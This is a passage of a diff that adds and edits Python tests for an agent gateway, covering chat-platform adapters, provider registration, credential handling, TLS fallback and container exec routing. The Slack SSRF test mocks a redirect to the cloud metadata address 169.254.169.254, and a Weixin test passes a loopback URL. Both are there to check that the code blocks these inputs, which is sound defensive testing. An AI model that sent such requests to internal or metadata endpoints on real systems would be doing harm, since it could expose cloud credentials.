@@ -1586,6 +1586,61 @@ class TestFallbackPreservesThreadContext:
|
||||
assert "important screenshot" in call_kwargs["text"]
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# TestSendImageSSRFGuards
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
class TestSendImageSSRFGuards:
|
||||
"""send_image should reject redirects that land on private/internal hosts."""
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_send_image_blocks_private_redirect_target(self, adapter):
|
||||
redirect_response = MagicMock()
|
||||
redirect_response.is_redirect = True
|
||||
redirect_response.next_request = MagicMock(
|
||||
url="http://169.254.169.254/latest/meta-data"
|
||||
)
|
||||
|
||||
client_kwargs = {}
|
||||
mock_client = AsyncMock()
|
||||
mock_client.__aenter__ = AsyncMock(return_value=mock_client)
|
||||
mock_client.__aexit__ = AsyncMock(return_value=False)
|
||||
|
||||
async def fake_get(_url):
|
||||
for hook in client_kwargs["event_hooks"]["response"]:
|
||||
await hook(redirect_response)
|
||||
|
||||
mock_client.get = AsyncMock(side_effect=fake_get)
|
||||
adapter._app.client.files_upload_v2 = AsyncMock(return_value={"ok": True})
|
||||
adapter._app.client.chat_postMessage = AsyncMock(return_value={"ts": "reply_ts"})
|
||||
|
||||
def fake_async_client(*args, **kwargs):
|
||||
client_kwargs.update(kwargs)
|
||||
return mock_client
|
||||
|
||||
def fake_is_safe_url(url):
|
||||
return url == "https://public.example/image.png"
|
||||
|
||||
with (
|
||||
patch("tools.url_safety.is_safe_url", side_effect=fake_is_safe_url),
|
||||
patch("httpx.AsyncClient", side_effect=fake_async_client),
|
||||
):
|
||||
result = await adapter.send_image(
|
||||
chat_id="C123",
|
||||
image_url="https://public.example/image.png",
|
||||
caption="see this",
|
||||
)
|
||||
|
||||
assert result.success
|
||||
assert client_kwargs["follow_redirects"] is True
|
||||
assert client_kwargs["event_hooks"]["response"]
|
||||
adapter._app.client.files_upload_v2.assert_not_awaited()
|
||||
adapter._app.client.chat_postMessage.assert_awaited_once()
|
||||
call_kwargs = adapter._app.client.chat_postMessage.call_args.kwargs
|
||||
assert "see this" in call_kwargs["text"]
|
||||
assert "https://public.example/image.png" in call_kwargs["text"]
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# TestProgressMessageThread
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
@@ -175,7 +175,7 @@ async def test_on_processing_start_handles_missing_ids(monkeypatch):
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_on_processing_complete_success(monkeypatch):
|
||||
"""Successful processing should set check mark reaction."""
|
||||
"""Successful processing should set thumbs-up reaction."""
|
||||
monkeypatch.setenv("TELEGRAM_REACTIONS", "true")
|
||||
adapter = _make_adapter()
|
||||
event = _make_event()
|
||||
@@ -185,13 +185,13 @@ async def test_on_processing_complete_success(monkeypatch):
|
||||
adapter._bot.set_message_reaction.assert_awaited_once_with(
|
||||
chat_id=123,
|
||||
message_id=456,
|
||||
reaction="\u2705",
|
||||
reaction="\U0001f44d",
|
||||
)
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_on_processing_complete_failure(monkeypatch):
|
||||
"""Failed processing should set cross mark reaction."""
|
||||
"""Failed processing should set thumbs-down reaction."""
|
||||
monkeypatch.setenv("TELEGRAM_REACTIONS", "true")
|
||||
adapter = _make_adapter()
|
||||
event = _make_event()
|
||||
@@ -201,7 +201,7 @@ async def test_on_processing_complete_failure(monkeypatch):
|
||||
adapter._bot.set_message_reaction.assert_awaited_once_with(
|
||||
chat_id=123,
|
||||
message_id=456,
|
||||
reaction="\u274c",
|
||||
reaction="\U0001f44e",
|
||||
)
|
||||
|
||||
|
||||
|
||||
@@ -0,0 +1,214 @@
|
||||
"""Tests for the Weixin platform adapter."""
|
||||
|
||||
import asyncio
|
||||
import os
|
||||
from unittest.mock import AsyncMock, patch
|
||||
|
||||
from gateway.config import PlatformConfig
|
||||
from gateway.config import GatewayConfig, HomeChannel, Platform, _apply_env_overrides
|
||||
from gateway.platforms.weixin import WeixinAdapter
|
||||
from tools.send_message_tool import _parse_target_ref, _send_to_platform
|
||||
|
||||
|
||||
def _make_adapter() -> WeixinAdapter:
|
||||
return WeixinAdapter(
|
||||
PlatformConfig(
|
||||
enabled=True,
|
||||
token="test-token",
|
||||
extra={"account_id": "test-account"},
|
||||
)
|
||||
)
|
||||
|
||||
|
||||
class TestWeixinFormatting:
|
||||
def test_format_message_preserves_markdown_and_rewrites_headers(self):
|
||||
adapter = _make_adapter()
|
||||
|
||||
content = "# Title\n\n## Plan\n\nUse **bold** and [docs](https://example.com)."
|
||||
|
||||
assert (
|
||||
adapter.format_message(content)
|
||||
== "【Title】\n\n**Plan**\n\nUse **bold** and [docs](https://example.com)."
|
||||
)
|
||||
|
||||
def test_format_message_rewrites_markdown_tables(self):
|
||||
adapter = _make_adapter()
|
||||
|
||||
content = (
|
||||
"| Setting | Value |\n"
|
||||
"| --- | --- |\n"
|
||||
"| Timeout | 30s |\n"
|
||||
"| Retries | 3 |\n"
|
||||
)
|
||||
|
||||
assert adapter.format_message(content) == (
|
||||
"- Setting: Timeout\n"
|
||||
" Value: 30s\n"
|
||||
"- Setting: Retries\n"
|
||||
" Value: 3"
|
||||
)
|
||||
|
||||
def test_format_message_preserves_fenced_code_blocks(self):
|
||||
adapter = _make_adapter()
|
||||
|
||||
content = "## Snippet\n\n```python\nprint('hi')\n```"
|
||||
|
||||
assert adapter.format_message(content) == "**Snippet**\n\n```python\nprint('hi')\n```"
|
||||
|
||||
def test_format_message_returns_empty_string_for_none(self):
|
||||
adapter = _make_adapter()
|
||||
|
||||
assert adapter.format_message(None) == ""
|
||||
|
||||
|
||||
class TestWeixinChunking:
|
||||
def test_split_text_sends_top_level_newlines_as_separate_messages(self):
|
||||
adapter = _make_adapter()
|
||||
|
||||
content = adapter.format_message("第一行\n第二行\n第三行")
|
||||
chunks = adapter._split_text(content)
|
||||
|
||||
assert chunks == ["第一行", "第二行", "第三行"]
|
||||
|
||||
def test_split_text_keeps_indented_followup_with_previous_line(self):
|
||||
adapter = _make_adapter()
|
||||
|
||||
content = adapter.format_message(
|
||||
"| Setting | Value |\n"
|
||||
"| --- | --- |\n"
|
||||
"| Timeout | 30s |\n"
|
||||
"| Retries | 3 |\n"
|
||||
)
|
||||
chunks = adapter._split_text(content)
|
||||
|
||||
assert chunks == [
|
||||
"- Setting: Timeout\n Value: 30s",
|
||||
"- Setting: Retries\n Value: 3",
|
||||
]
|
||||
|
||||
def test_split_text_keeps_complete_code_block_together_when_possible(self):
|
||||
adapter = _make_adapter()
|
||||
adapter.MAX_MESSAGE_LENGTH = 80
|
||||
|
||||
content = adapter.format_message(
|
||||
"## Intro\n\nShort paragraph.\n\n```python\nprint('hello world')\nprint('again')\n```\n\nTail paragraph."
|
||||
)
|
||||
chunks = adapter._split_text(content)
|
||||
|
||||
assert len(chunks) >= 2
|
||||
assert any(
|
||||
"```python\nprint('hello world')\nprint('again')\n```" in chunk
|
||||
for chunk in chunks
|
||||
)
|
||||
assert all(chunk.count("```") % 2 == 0 for chunk in chunks)
|
||||
|
||||
def test_split_text_safely_splits_long_code_blocks(self):
|
||||
adapter = _make_adapter()
|
||||
adapter.MAX_MESSAGE_LENGTH = 70
|
||||
|
||||
lines = "\n".join(f"line_{idx:02d} = {idx}" for idx in range(10))
|
||||
content = adapter.format_message(f"```python\n{lines}\n```")
|
||||
chunks = adapter._split_text(content)
|
||||
|
||||
assert len(chunks) > 1
|
||||
assert all(len(chunk) <= adapter.MAX_MESSAGE_LENGTH for chunk in chunks)
|
||||
assert all(chunk.count("```") >= 2 for chunk in chunks)
|
||||
|
||||
|
||||
class TestWeixinConfig:
|
||||
def test_apply_env_overrides_configures_weixin(self):
|
||||
config = GatewayConfig()
|
||||
|
||||
with patch.dict(
|
||||
os.environ,
|
||||
{
|
||||
"WEIXIN_ACCOUNT_ID": "bot-account",
|
||||
"WEIXIN_TOKEN": "bot-token",
|
||||
"WEIXIN_BASE_URL": "https://ilink.example.com/",
|
||||
"WEIXIN_CDN_BASE_URL": "https://cdn.example.com/c2c/",
|
||||
"WEIXIN_DM_POLICY": "allowlist",
|
||||
"WEIXIN_ALLOWED_USERS": "wxid_1,wxid_2",
|
||||
"WEIXIN_HOME_CHANNEL": "wxid_1",
|
||||
"WEIXIN_HOME_CHANNEL_NAME": "Primary DM",
|
||||
},
|
||||
clear=True,
|
||||
):
|
||||
_apply_env_overrides(config)
|
||||
|
||||
platform_config = config.platforms[Platform.WEIXIN]
|
||||
assert platform_config.enabled is True
|
||||
assert platform_config.token == "bot-token"
|
||||
assert platform_config.extra["account_id"] == "bot-account"
|
||||
assert platform_config.extra["base_url"] == "https://ilink.example.com"
|
||||
assert platform_config.extra["cdn_base_url"] == "https://cdn.example.com/c2c"
|
||||
assert platform_config.extra["dm_policy"] == "allowlist"
|
||||
assert platform_config.extra["allow_from"] == "wxid_1,wxid_2"
|
||||
assert platform_config.home_channel == HomeChannel(Platform.WEIXIN, "wxid_1", "Primary DM")
|
||||
|
||||
def test_get_connected_platforms_includes_weixin_with_token(self):
|
||||
config = GatewayConfig(
|
||||
platforms={
|
||||
Platform.WEIXIN: PlatformConfig(
|
||||
enabled=True,
|
||||
token="bot-token",
|
||||
extra={"account_id": "bot-account"},
|
||||
)
|
||||
}
|
||||
)
|
||||
|
||||
assert config.get_connected_platforms() == [Platform.WEIXIN]
|
||||
|
||||
def test_get_connected_platforms_requires_account_id(self):
|
||||
config = GatewayConfig(
|
||||
platforms={
|
||||
Platform.WEIXIN: PlatformConfig(
|
||||
enabled=True,
|
||||
token="bot-token",
|
||||
)
|
||||
}
|
||||
)
|
||||
|
||||
assert config.get_connected_platforms() == []
|
||||
|
||||
|
||||
class TestWeixinSendMessageIntegration:
|
||||
def test_parse_target_ref_accepts_weixin_ids(self):
|
||||
assert _parse_target_ref("weixin", "wxid_test123") == ("wxid_test123", None, True)
|
||||
assert _parse_target_ref("weixin", "filehelper") == ("filehelper", None, True)
|
||||
assert _parse_target_ref("weixin", "group@chatroom") == ("group@chatroom", None, True)
|
||||
|
||||
@patch("tools.send_message_tool._send_weixin", new_callable=AsyncMock)
|
||||
def test_send_to_platform_routes_weixin_media_to_native_helper(self, send_weixin_mock):
|
||||
send_weixin_mock.return_value = {"success": True, "platform": "weixin", "chat_id": "wxid_test123"}
|
||||
config = PlatformConfig(enabled=True, token="bot-token", extra={"account_id": "bot-account"})
|
||||
|
||||
result = asyncio.run(
|
||||
_send_to_platform(
|
||||
Platform.WEIXIN,
|
||||
config,
|
||||
"wxid_test123",
|
||||
"hello",
|
||||
media_files=[("/tmp/demo.png", False)],
|
||||
)
|
||||
)
|
||||
|
||||
assert result["success"] is True
|
||||
send_weixin_mock.assert_awaited_once_with(
|
||||
config,
|
||||
"wxid_test123",
|
||||
"hello",
|
||||
media_files=[("/tmp/demo.png", False)],
|
||||
)
|
||||
|
||||
|
||||
class TestWeixinRemoteMediaSafety:
|
||||
def test_download_remote_media_blocks_unsafe_urls(self):
|
||||
adapter = _make_adapter()
|
||||
|
||||
with patch("tools.url_safety.is_safe_url", return_value=False):
|
||||
try:
|
||||
asyncio.run(adapter._download_remote_media("http://127.0.0.1/private.png"))
|
||||
except ValueError as exc:
|
||||
assert "Blocked unsafe URL" in str(exc)
|
||||
else:
|
||||
raise AssertionError("expected ValueError for unsafe URL")
|
||||
@@ -40,6 +40,7 @@ class TestProviderRegistry:
|
||||
("copilot", "GitHub Copilot", "api_key"),
|
||||
("huggingface", "Hugging Face", "api_key"),
|
||||
("zai", "Z.AI / GLM", "api_key"),
|
||||
("xai", "xAI", "api_key"),
|
||||
("kimi-coding", "Kimi / Moonshot", "api_key"),
|
||||
("minimax", "MiniMax", "api_key"),
|
||||
("minimax-cn", "MiniMax (China)", "api_key"),
|
||||
@@ -58,6 +59,12 @@ class TestProviderRegistry:
|
||||
assert pconfig.api_key_env_vars == ("GLM_API_KEY", "ZAI_API_KEY", "Z_AI_API_KEY")
|
||||
assert pconfig.base_url_env_var == "GLM_BASE_URL"
|
||||
|
||||
def test_xai_env_vars(self):
|
||||
pconfig = PROVIDER_REGISTRY["xai"]
|
||||
assert pconfig.api_key_env_vars == ("XAI_API_KEY",)
|
||||
assert pconfig.base_url_env_var == "XAI_BASE_URL"
|
||||
assert pconfig.inference_base_url == "https://api.x.ai/v1"
|
||||
|
||||
def test_copilot_env_vars(self):
|
||||
pconfig = PROVIDER_REGISTRY["copilot"]
|
||||
assert pconfig.api_key_env_vars == ("COPILOT_GITHUB_TOKEN", "GH_TOKEN", "GITHUB_TOKEN")
|
||||
|
||||
@@ -657,3 +657,41 @@ def test_auth_remove_manual_entry_does_not_touch_env(tmp_path, monkeypatch):
|
||||
|
||||
# .env should be untouched
|
||||
assert env_path.read_text() == "SOME_KEY=some-value\n"
|
||||
|
||||
|
||||
def test_auth_remove_claude_code_suppresses_reseed(tmp_path, monkeypatch):
|
||||
"""Removing a claude_code credential must prevent it from being re-seeded."""
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path / "hermes"))
|
||||
monkeypatch.delenv("ANTHROPIC_API_KEY", raising=False)
|
||||
monkeypatch.delenv("ANTHROPIC_TOKEN", raising=False)
|
||||
monkeypatch.delenv("CLAUDE_CODE_OAUTH_TOKEN", raising=False)
|
||||
monkeypatch.setattr(
|
||||
"agent.credential_pool._seed_from_singletons",
|
||||
lambda provider, entries: (False, {"claude_code"}),
|
||||
)
|
||||
hermes_home = tmp_path / "hermes"
|
||||
hermes_home.mkdir(parents=True, exist_ok=True)
|
||||
|
||||
auth_store = {
|
||||
"version": 1,
|
||||
"credential_pool": {
|
||||
"anthropic": [{
|
||||
"id": "cc1",
|
||||
"label": "claude_code",
|
||||
"auth_type": "oauth",
|
||||
"priority": 0,
|
||||
"source": "claude_code",
|
||||
"access_token": "sk-ant-oat01-token",
|
||||
}]
|
||||
},
|
||||
}
|
||||
(hermes_home / "auth.json").write_text(json.dumps(auth_store))
|
||||
|
||||
from types import SimpleNamespace
|
||||
from hermes_cli.auth_commands import auth_remove_command
|
||||
auth_remove_command(SimpleNamespace(provider="anthropic", target="1"))
|
||||
|
||||
updated = json.loads((hermes_home / "auth.json").read_text())
|
||||
suppressed = updated.get("suppressed_sources", {})
|
||||
assert "anthropic" in suppressed
|
||||
assert "claude_code" in suppressed["anthropic"]
|
||||
|
||||
@@ -1,6 +1,7 @@
|
||||
"""Regression tests for Nous OAuth refresh + agent-key mint interactions."""
|
||||
|
||||
import json
|
||||
import os
|
||||
from datetime import datetime, timezone
|
||||
from pathlib import Path
|
||||
|
||||
@@ -10,6 +11,80 @@ import pytest
|
||||
from hermes_cli.auth import AuthError, get_provider_auth_state, resolve_nous_runtime_credentials
|
||||
|
||||
|
||||
# =============================================================================
|
||||
# _resolve_verify: CA bundle path validation
|
||||
# =============================================================================
|
||||
|
||||
|
||||
class TestResolveVerifyFallback:
|
||||
"""Verify _resolve_verify falls back to True when CA bundle path doesn't exist."""
|
||||
|
||||
def test_missing_ca_bundle_in_auth_state_falls_back(self):
|
||||
from hermes_cli.auth import _resolve_verify
|
||||
|
||||
result = _resolve_verify(auth_state={
|
||||
"tls": {"insecure": False, "ca_bundle": "/nonexistent/ca-bundle.pem"},
|
||||
})
|
||||
assert result is True
|
||||
|
||||
def test_valid_ca_bundle_in_auth_state_is_returned(self, tmp_path):
|
||||
from hermes_cli.auth import _resolve_verify
|
||||
|
||||
ca_file = tmp_path / "ca-bundle.pem"
|
||||
ca_file.write_text("fake cert")
|
||||
result = _resolve_verify(auth_state={
|
||||
"tls": {"insecure": False, "ca_bundle": str(ca_file)},
|
||||
})
|
||||
assert result == str(ca_file)
|
||||
|
||||
def test_missing_ssl_cert_file_env_falls_back(self, monkeypatch):
|
||||
from hermes_cli.auth import _resolve_verify
|
||||
|
||||
monkeypatch.setenv("SSL_CERT_FILE", "/nonexistent/ssl-cert.pem")
|
||||
monkeypatch.delenv("HERMES_CA_BUNDLE", raising=False)
|
||||
result = _resolve_verify(auth_state={"tls": {}})
|
||||
assert result is True
|
||||
|
||||
def test_missing_hermes_ca_bundle_env_falls_back(self, monkeypatch):
|
||||
from hermes_cli.auth import _resolve_verify
|
||||
|
||||
monkeypatch.setenv("HERMES_CA_BUNDLE", "/nonexistent/hermes-ca.pem")
|
||||
monkeypatch.delenv("SSL_CERT_FILE", raising=False)
|
||||
result = _resolve_verify(auth_state={"tls": {}})
|
||||
assert result is True
|
||||
|
||||
def test_insecure_takes_precedence_over_missing_ca(self):
|
||||
from hermes_cli.auth import _resolve_verify
|
||||
|
||||
result = _resolve_verify(
|
||||
insecure=True,
|
||||
auth_state={"tls": {"ca_bundle": "/nonexistent/ca.pem"}},
|
||||
)
|
||||
assert result is False
|
||||
|
||||
def test_no_ca_bundle_returns_true(self, monkeypatch):
|
||||
from hermes_cli.auth import _resolve_verify
|
||||
|
||||
monkeypatch.delenv("HERMES_CA_BUNDLE", raising=False)
|
||||
monkeypatch.delenv("SSL_CERT_FILE", raising=False)
|
||||
result = _resolve_verify(auth_state={"tls": {}})
|
||||
assert result is True
|
||||
|
||||
def test_explicit_ca_bundle_param_missing_falls_back(self):
|
||||
from hermes_cli.auth import _resolve_verify
|
||||
|
||||
result = _resolve_verify(ca_bundle="/nonexistent/explicit-ca.pem")
|
||||
assert result is True
|
||||
|
||||
def test_explicit_ca_bundle_param_valid_is_returned(self, tmp_path):
|
||||
from hermes_cli.auth import _resolve_verify
|
||||
|
||||
ca_file = tmp_path / "explicit-ca.pem"
|
||||
ca_file.write_text("fake cert")
|
||||
result = _resolve_verify(ca_bundle=str(ca_file))
|
||||
assert result == str(ca_file)
|
||||
|
||||
|
||||
def _setup_nous_auth(
|
||||
hermes_home: Path,
|
||||
*,
|
||||
|
||||
@@ -0,0 +1,78 @@
|
||||
"""Tests for is_provider_explicitly_configured()."""
|
||||
|
||||
import json
|
||||
import os
|
||||
import pytest
|
||||
|
||||
|
||||
def _write_config(tmp_path, config: dict) -> None:
|
||||
hermes_home = tmp_path / "hermes"
|
||||
hermes_home.mkdir(parents=True, exist_ok=True)
|
||||
import yaml
|
||||
(hermes_home / "config.yaml").write_text(yaml.dump(config))
|
||||
|
||||
|
||||
def _write_auth_store(tmp_path, payload: dict) -> None:
|
||||
hermes_home = tmp_path / "hermes"
|
||||
hermes_home.mkdir(parents=True, exist_ok=True)
|
||||
(hermes_home / "auth.json").write_text(json.dumps(payload, indent=2))
|
||||
|
||||
|
||||
def test_returns_false_when_no_config(tmp_path, monkeypatch):
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path / "hermes"))
|
||||
(tmp_path / "hermes").mkdir(parents=True, exist_ok=True)
|
||||
|
||||
from hermes_cli.auth import is_provider_explicitly_configured
|
||||
assert is_provider_explicitly_configured("anthropic") is False
|
||||
|
||||
|
||||
def test_returns_true_when_active_provider_matches(tmp_path, monkeypatch):
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path / "hermes"))
|
||||
_write_auth_store(tmp_path, {
|
||||
"version": 1,
|
||||
"providers": {},
|
||||
"active_provider": "anthropic",
|
||||
})
|
||||
|
||||
from hermes_cli.auth import is_provider_explicitly_configured
|
||||
assert is_provider_explicitly_configured("anthropic") is True
|
||||
|
||||
|
||||
def test_returns_true_when_config_provider_matches(tmp_path, monkeypatch):
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path / "hermes"))
|
||||
_write_config(tmp_path, {"model": {"provider": "anthropic", "default": "claude-sonnet-4-6"}})
|
||||
|
||||
from hermes_cli.auth import is_provider_explicitly_configured
|
||||
assert is_provider_explicitly_configured("anthropic") is True
|
||||
|
||||
|
||||
def test_returns_false_when_config_provider_is_different(tmp_path, monkeypatch):
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path / "hermes"))
|
||||
_write_config(tmp_path, {"model": {"provider": "kimi-coding", "default": "kimi-k2"}})
|
||||
_write_auth_store(tmp_path, {
|
||||
"version": 1,
|
||||
"providers": {},
|
||||
"active_provider": None,
|
||||
})
|
||||
|
||||
from hermes_cli.auth import is_provider_explicitly_configured
|
||||
assert is_provider_explicitly_configured("anthropic") is False
|
||||
|
||||
|
||||
def test_returns_true_when_anthropic_env_var_set(tmp_path, monkeypatch):
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path / "hermes"))
|
||||
monkeypatch.setenv("ANTHROPIC_API_KEY", "sk-ant-api03-realkey")
|
||||
(tmp_path / "hermes").mkdir(parents=True, exist_ok=True)
|
||||
|
||||
from hermes_cli.auth import is_provider_explicitly_configured
|
||||
assert is_provider_explicitly_configured("anthropic") is True
|
||||
|
||||
|
||||
def test_claude_code_oauth_token_does_not_count_as_explicit(tmp_path, monkeypatch):
|
||||
"""CLAUDE_CODE_OAUTH_TOKEN is set by Claude Code, not the user — must not gate."""
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path / "hermes"))
|
||||
monkeypatch.setenv("CLAUDE_CODE_OAUTH_TOKEN", "sk-ant-oat01-auto-token")
|
||||
(tmp_path / "hermes").mkdir(parents=True, exist_ok=True)
|
||||
|
||||
from hermes_cli.auth import is_provider_explicitly_configured
|
||||
assert is_provider_explicitly_configured("anthropic") is False
|
||||
@@ -150,6 +150,12 @@ class TestNormalizeModelForProvider:
|
||||
assert changed is False
|
||||
assert cli.model == "gpt-5.4"
|
||||
|
||||
def test_native_provider_prefix_is_stripped_before_agent_startup(self):
|
||||
cli = _make_cli(model="zai/glm-5.1")
|
||||
changed = cli._normalize_model_for_provider("zai")
|
||||
assert changed is True
|
||||
assert cli.model == "glm-5.1"
|
||||
|
||||
def test_bare_codex_model_passes_through(self):
|
||||
cli = _make_cli(model="gpt-5.3-codex")
|
||||
changed = cli._normalize_model_for_provider("openai-codex")
|
||||
|
||||
@@ -0,0 +1,275 @@
|
||||
"""Tests for container-aware CLI routing (NixOS container mode).
|
||||
|
||||
When container.enable = true in the NixOS module, the activation script
|
||||
writes a .container-mode metadata file. The host CLI detects this and
|
||||
execs into the container instead of running locally.
|
||||
"""
|
||||
import os
|
||||
from pathlib import Path
|
||||
from types import SimpleNamespace
|
||||
from unittest.mock import MagicMock, patch
|
||||
|
||||
import pytest
|
||||
|
||||
from hermes_cli.config import (
|
||||
_is_inside_container,
|
||||
get_container_exec_info,
|
||||
)
|
||||
|
||||
|
||||
# =============================================================================
|
||||
# _is_inside_container
|
||||
# =============================================================================
|
||||
|
||||
|
||||
def test_is_inside_container_dockerenv(tmp_path):
|
||||
"""Detects /.dockerenv marker file."""
|
||||
with patch("os.path.exists") as mock_exists:
|
||||
mock_exists.side_effect = lambda p: p == "/.dockerenv"
|
||||
assert _is_inside_container() is True
|
||||
|
||||
|
||||
def test_is_inside_container_containerenv(tmp_path):
|
||||
"""Detects Podman's /run/.containerenv marker."""
|
||||
with patch("os.path.exists") as mock_exists:
|
||||
mock_exists.side_effect = lambda p: p == "/run/.containerenv"
|
||||
assert _is_inside_container() is True
|
||||
|
||||
|
||||
def test_is_inside_container_cgroup_docker():
|
||||
"""Detects 'docker' in /proc/1/cgroup."""
|
||||
with patch("os.path.exists", return_value=False), \
|
||||
patch("builtins.open", create=True) as mock_open:
|
||||
mock_open.return_value.__enter__ = lambda s: s
|
||||
mock_open.return_value.__exit__ = MagicMock(return_value=False)
|
||||
mock_open.return_value.read = MagicMock(
|
||||
return_value="12:memory:/docker/abc123\n"
|
||||
)
|
||||
assert _is_inside_container() is True
|
||||
|
||||
|
||||
def test_is_inside_container_false_on_host():
|
||||
"""Returns False when none of the container indicators are present."""
|
||||
with patch("os.path.exists", return_value=False), \
|
||||
patch("builtins.open", side_effect=OSError("no such file")):
|
||||
assert _is_inside_container() is False
|
||||
|
||||
|
||||
# =============================================================================
|
||||
# get_container_exec_info
|
||||
# =============================================================================
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def container_env(tmp_path, monkeypatch):
|
||||
"""Set up a fake HERMES_HOME with .container-mode file."""
|
||||
hermes_home = tmp_path / ".hermes"
|
||||
hermes_home.mkdir()
|
||||
monkeypatch.setenv("HERMES_HOME", str(hermes_home))
|
||||
|
||||
container_mode = hermes_home / ".container-mode"
|
||||
container_mode.write_text(
|
||||
"# Written by NixOS activation script. Do not edit manually.\n"
|
||||
"backend=podman\n"
|
||||
"container_name=hermes-agent\n"
|
||||
"hermes_bin=/data/current-package/bin/hermes\n"
|
||||
)
|
||||
return hermes_home
|
||||
|
||||
|
||||
def test_get_container_exec_info_returns_metadata(container_env):
|
||||
"""Reads .container-mode and returns backend/name/bin."""
|
||||
with patch("hermes_cli.config._is_inside_container", return_value=False):
|
||||
info = get_container_exec_info()
|
||||
|
||||
assert info is not None
|
||||
assert info["backend"] == "podman"
|
||||
assert info["container_name"] == "hermes-agent"
|
||||
assert info["hermes_bin"] == "/data/current-package/bin/hermes"
|
||||
|
||||
|
||||
def test_get_container_exec_info_none_inside_container(container_env):
|
||||
"""Returns None when we're already inside a container."""
|
||||
with patch("hermes_cli.config._is_inside_container", return_value=True):
|
||||
info = get_container_exec_info()
|
||||
|
||||
assert info is None
|
||||
|
||||
|
||||
def test_get_container_exec_info_none_without_file(tmp_path, monkeypatch):
|
||||
"""Returns None when .container-mode doesn't exist (native mode)."""
|
||||
hermes_home = tmp_path / ".hermes"
|
||||
hermes_home.mkdir()
|
||||
monkeypatch.setenv("HERMES_HOME", str(hermes_home))
|
||||
|
||||
with patch("hermes_cli.config._is_inside_container", return_value=False):
|
||||
info = get_container_exec_info()
|
||||
|
||||
assert info is None
|
||||
|
||||
|
||||
def test_get_container_exec_info_defaults():
|
||||
"""Falls back to defaults for missing keys."""
|
||||
import tempfile
|
||||
|
||||
with tempfile.TemporaryDirectory() as tmpdir:
|
||||
hermes_home = Path(tmpdir) / ".hermes"
|
||||
hermes_home.mkdir()
|
||||
(hermes_home / ".container-mode").write_text(
|
||||
"# minimal file with no keys\n"
|
||||
)
|
||||
|
||||
with patch("hermes_cli.config._is_inside_container", return_value=False), \
|
||||
patch("hermes_cli.config.get_hermes_home", return_value=hermes_home):
|
||||
info = get_container_exec_info()
|
||||
|
||||
assert info is not None
|
||||
assert info["backend"] == "docker"
|
||||
assert info["container_name"] == "hermes-agent"
|
||||
assert info["hermes_bin"] == "/data/current-package/bin/hermes"
|
||||
|
||||
|
||||
def test_get_container_exec_info_docker_backend(container_env):
|
||||
"""Correctly reads docker backend."""
|
||||
(container_env / ".container-mode").write_text(
|
||||
"backend=docker\n"
|
||||
"container_name=hermes-custom\n"
|
||||
"hermes_bin=/opt/hermes/bin/hermes\n"
|
||||
)
|
||||
|
||||
with patch("hermes_cli.config._is_inside_container", return_value=False):
|
||||
info = get_container_exec_info()
|
||||
|
||||
assert info["backend"] == "docker"
|
||||
assert info["container_name"] == "hermes-custom"
|
||||
assert info["hermes_bin"] == "/opt/hermes/bin/hermes"
|
||||
|
||||
|
||||
# =============================================================================
|
||||
# _exec_in_container
|
||||
# =============================================================================
|
||||
|
||||
|
||||
def test_exec_in_container_calls_execvp():
|
||||
"""Verifies os.execvp is called with the correct command."""
|
||||
from hermes_cli.main import _exec_in_container
|
||||
|
||||
container_info = {
|
||||
"backend": "podman",
|
||||
"container_name": "hermes-agent",
|
||||
"hermes_bin": "/data/current-package/bin/hermes",
|
||||
}
|
||||
|
||||
with patch("shutil.which", return_value="/usr/bin/podman"), \
|
||||
patch("subprocess.run") as mock_run, \
|
||||
patch("os.execvp") as mock_exec:
|
||||
# Simulate running container
|
||||
mock_result = MagicMock()
|
||||
mock_result.returncode = 0
|
||||
mock_result.stdout = "true\n"
|
||||
mock_run.return_value = mock_result
|
||||
|
||||
_exec_in_container(container_info, ["chat", "-m", "claude-sonnet-4"])
|
||||
|
||||
mock_exec.assert_called_once_with(
|
||||
"/usr/bin/podman",
|
||||
["/usr/bin/podman", "exec", "-it", "hermes-agent",
|
||||
"/data/current-package/bin/hermes", "chat", "-m", "claude-sonnet-4"]
|
||||
)
|
||||
|
||||
|
||||
def test_exec_in_container_strips_host_flag():
|
||||
"""The --host flag is not forwarded into the container."""
|
||||
from hermes_cli.main import _exec_in_container
|
||||
|
||||
container_info = {
|
||||
"backend": "podman",
|
||||
"container_name": "hermes-agent",
|
||||
"hermes_bin": "/data/current-package/bin/hermes",
|
||||
}
|
||||
|
||||
with patch("shutil.which", return_value="/usr/bin/podman"), \
|
||||
patch("subprocess.run") as mock_run, \
|
||||
patch("os.execvp") as mock_exec:
|
||||
mock_result = MagicMock()
|
||||
mock_result.returncode = 0
|
||||
mock_result.stdout = "true\n"
|
||||
mock_run.return_value = mock_result
|
||||
|
||||
_exec_in_container(container_info, ["chat", "--host", "-q", "hello"])
|
||||
|
||||
# --host should be stripped
|
||||
exec_args = mock_exec.call_args[0][1]
|
||||
assert "--host" not in exec_args
|
||||
assert "-q" in exec_args
|
||||
assert "hello" in exec_args
|
||||
|
||||
|
||||
def test_exec_in_container_fallback_no_runtime(capsys):
|
||||
"""Falls back gracefully when container runtime is not found."""
|
||||
from hermes_cli.main import _exec_in_container
|
||||
|
||||
container_info = {
|
||||
"backend": "podman",
|
||||
"container_name": "hermes-agent",
|
||||
"hermes_bin": "/data/current-package/bin/hermes",
|
||||
}
|
||||
|
||||
with patch("shutil.which", return_value=None), \
|
||||
patch("os.execvp") as mock_exec:
|
||||
_exec_in_container(container_info, ["chat"])
|
||||
|
||||
# Should NOT call execvp — graceful fallback
|
||||
mock_exec.assert_not_called()
|
||||
|
||||
captured = capsys.readouterr()
|
||||
assert "not found on PATH" in captured.err
|
||||
|
||||
|
||||
def test_exec_in_container_fallback_container_not_running(capsys):
|
||||
"""Falls back when container exists but is not running."""
|
||||
